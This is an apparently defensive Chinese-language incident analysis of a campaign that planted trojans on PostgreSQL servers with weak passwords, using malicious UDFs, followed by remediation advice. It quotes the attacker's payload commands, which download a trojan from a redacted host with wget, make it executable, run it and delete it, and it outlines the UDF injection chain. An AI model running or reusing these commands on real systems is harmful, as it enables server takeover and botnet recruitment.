近日，曝露出一起利用PostgreSQL弱口令批量植入木马的事件。本文将分享对此次事件的追踪过程，从攻击方式，用到的工具，到攻击的范围，还原整个攻击事件。

0x01 发现

我们发现这个传播源头为一个HFS文件服务器：

在HFS服务器中，发现了黑客用来批量扫描漏洞和自动攻击的程序：ps.exe和pexec.exe。下载到本地进行分析之后，判定此工具为针对PostgreSQL数据库的自动化攻击程序。

程序使用了C#编写，ps.exe负责扫描PostgreSQL服务弱口令,将扫描结果通过web接口记录到文件:

黑客将扫描到弱口令的IP列表导入到pexec.exe，程序会首先判断服务器PostgreSQL的版本，通过SQL写入对应的/tmp/testproxy.so文件，然后创建名为exec111的UDF函数，最后通过UDF执行恶意指令。

有趣的是，我们在利用程序中并没有发现针对windows版本的postgresql进行利用的代码，说明黑客的程序还是一个半成品。下面是针对linux下PostgreSQL 9.3版本的部分利用代码：

在两个程序中，作者都写入了对硬件CPU ID的判断，程序仅允许在指定机器运行，但是作者却没对程序代码做混淆和加壳：

在攻击者HFS上，我们还发现了黑客已经扫描到的PostgreSQL弱口令和利用成功的IP列表：

这份数据里包含了被植入木马的2626个IP地址，以及刚扫描出的1217台存在弱口令的PostgreSQL服务器IP地址。

进一步对攻击者植入的UDF程序进行逆向分析，发现该UDF执行了如下命令：

#!bash
wget -P /tmp/ http://***.**.***.*:1234/testproxy -O /tmp/testproxy
chmod 777 /tmp/testproxy
/tmp/testproxy > testtmp &
rm -rf ./testproxy

testproxy是真正的木马程序，启动后会尝试解析 ******.com 域名，并连接其80端口，等待C&C发送指令并执行

0x02 攻击链路还原

1. 黑客通过ps.exe程序，全网扫描存在弱口令和空口令的PostgreSQL服务器并将IP保存。
2. 利用PostgreSQL pg_largeobject的特性，对漏洞主机发起攻击：将恶意udf分段写入PosrgreSQL表中，并导出实体文件到: /tmp/testproxy.so
3. 从/tmp/testproxy.so导入恶意代码，创建UDF函数并执行，下载恶意文件传播源（HFS服务器）上的testproxy木马并运行。
4. 木马启动后会尝试连接 baby***9.com 域名的 80端口，等待C&C发送指令。

0x03 漏洞影响

攻击者扫描全网存在弱口令和空口令的PostgreSQL数据库主机，通过UDF函数植入木马，通过木马程序，攻击者可以控制受害机器发起恶意行为。我们推测黑客还处于批量“抓鸡”阶段，可能会利用在DDos领域。

0x04影响范围

全国很多台服务器运行着PostgreSQL服务，其中可以通过弱口令登录PostgreSQL的服务器有并不在少数。

在分析PostgreSQL弱口令的过程中，我们注意到了PostgreSQL的一个特性，即“信任IP登录”。在pg_hba.conf文件中，如果把某个IP段的auth-method字段配置为“trust”，意味着在该IP段下不需要任何验证即可访问数据库中所有数据。对上述1353台存在弱口令的服务器进行深入分析，我们发现超过50%的PostgreSQL对所有IP都开启了“trust”模式，这些服务器都存在极大的安全风险！

0x05 修复建议

1. 禁止postgresql以root权限运行，建议使用独立帐号运行

   #!bash
   adduser dbuser
   sudo su - dbuser
   

2. 修改数据库帐号为强密码，例如

   #!bash
   alter user postgres with password 'aliyunSecurity1234*_*';
   

3. 检查PostgreSQL配置文件pg_hba.conf中是否存在： host all all 0.0.0.0/0 trust ，建议修改为使用密码认证。

4. 查看是否存在恶意UDF函数

   #!bash
   select proname,prosrc from pg_proc where proname = 'exec111';
   

5. 查看是否存在可疑UDF函数

   #!bash
   select proname,prosrc from pg_proc;
   //查看哪些函数不是系统预设的、或者管理员自己添加的
   

6. 查看是否存在可疑存储过程

   #!bash
   select tgrelid from pg_trigger;
   

7. 检查自己服务器是否存在/tmp/testproxy.so文件